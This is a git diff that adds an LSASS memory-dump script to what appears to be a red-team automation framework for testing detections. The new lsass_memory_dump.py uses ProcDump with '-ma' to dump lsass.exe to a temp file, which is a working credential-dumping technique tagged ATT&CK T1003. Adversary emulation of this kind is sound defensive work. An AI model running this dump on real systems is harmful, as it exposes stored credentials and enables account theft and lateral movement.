diff --git a/README.md b/README.md
index 91a002d..aa09823 100755
--- a/README.md
+++ b/README.md
@@ -24,7 +24,7 @@ The following table provides dependency information:
 
 | Dependency | RTAs | source |
 | ---        | ---  | ---    |
-| Sysinternals Suite | user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) |
+| Sysinternals Suite | lsass_memory_dump.py, user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) |
 | MsXsl              | msxsl_network.py | [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=21714) |
 
 
diff --git a/red_ttp/common.py b/red_ttp/common.py
index c7c8213..bc2f896 100755
--- a/red_ttp/common.py
+++ b/red_ttp/common.py
@@ -313,6 +313,7 @@ def check_system():
 
 
 PS_EXEC = get_path("bin", "PsExec.exe")
+PROCDUMP = get_path("bin", "procdump.exe")
 
 
 def run_system(arguments=None):
diff --git a/red_ttp/lsass_memory_dump.py b/red_ttp/lsass_memory_dump.py
new file mode 100644
index 0000000..f50547d
--- /dev/null
+++ b/red_ttp/lsass_memory_dump.py
@@ -0,0 +1,40 @@
+# Name: Dump LSASS Memory with ProcDump
+# RTA: lsass_memory_dump.py
+# ATT&CK: T1003
+# Description: Uses Sysinternals ProcDump to dump the memory space of lsass.exe.
+
+import common
+import os
+import errno
+
+DUMPFILE = "C:\Windows\Temp\RTA\lsass.dmp"
+@common.dependencies(common.PROCDUMP)
+def main():
+    
+    common.log("Ensuring dump folder exists...")
+    if os.path.exists(os.path.dirname(DUMPFILE)):
+        common.log("Dump folder exists, moving on!")
+    else:
+        common.log("Dump folder doesn't exist, creating...")
+        try:
+            os.makedirs(os.path.dirname(DUMPFILE))
+        except OSError as e:
+            if e.errno != errno.EEXIST:
+                common.log("Failed to create dump folder!")
+                raise
+
+    common.log("Executing procdump.exe...")
+    code, output = common.execute([common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE])
+    
+    if code == 0:
+        common.log("Successfully executed procdump.exe!")
+    else:
+        common.log("Failed to execute procdump.exe.")
+
+    if os.path.exists(DUMPFILE):
+        common.log("Successfully created " + DUMPFILE)
+    else:
+        common.log ("Failed to create " + DUMPFILE)
+
+if __name__ == "__main__":
+    exit(main())